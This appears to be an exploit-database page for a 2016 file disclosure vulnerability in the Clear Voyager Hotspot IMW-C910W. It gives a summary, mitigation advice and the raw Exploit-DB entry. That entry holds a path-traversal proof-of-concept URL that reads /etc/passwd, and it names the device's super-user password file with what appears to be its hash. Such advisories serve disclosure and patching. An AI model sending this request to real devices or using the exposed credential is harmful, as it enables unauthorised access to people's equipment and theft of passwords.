header-logo
Suggest Exploit
vendor:
Clear Voyager Hotspot IMW-C910W
by:
Damaster
7,5
CVSS
HIGH
File Disclosure
200
CWE
Product Name: Clear Voyager Hotspot IMW-C910W
Affected Version From: R4383
Affected Version To: R4383
Patch Exists: YES
Related CWE: N/A
CPE: h:sprint:clear_voyager_hotspot_imw-c910w
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

clear voyager hotspot IMW-C910W – file disclosure

An attacker can exploit a file disclosure vulnerability in clear voyager hotspot IMW-C910W by sending a specially crafted HTTP request to the vulnerable device. This can allow the attacker to access sensitive information such as passwords stored in the device.

Mitigation:

The vendor should ensure that the device is not exposed to the internet and should be kept behind a firewall. Additionally, the device should be updated to the latest version of the software.
Source

Exploit-DB raw data:

- # Exploit Title: clear voyager hotspot IMW-C910W - file disclosure
- # Date: 2016/jul/15
- # Exploit Author: Damaster
- # Vendor Homepage: https://www.sprint.com/
- # Software Link: https://web.archive.org/web/20150526042938/http://www.clearwire.com/downloads/IMW-C910W_V2234_R4383A.bin
- # Version: R4383
-  
- poc : http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../etc/passwd
-  
- vulnerable Device Software Version : R4383
-  
- super user password
- =================
- file : /etc/httpd/super.htpasswd
- content : super:YBfFG25mEAdSg
- =================

Navigation

Suggest Exploit

Services By CQR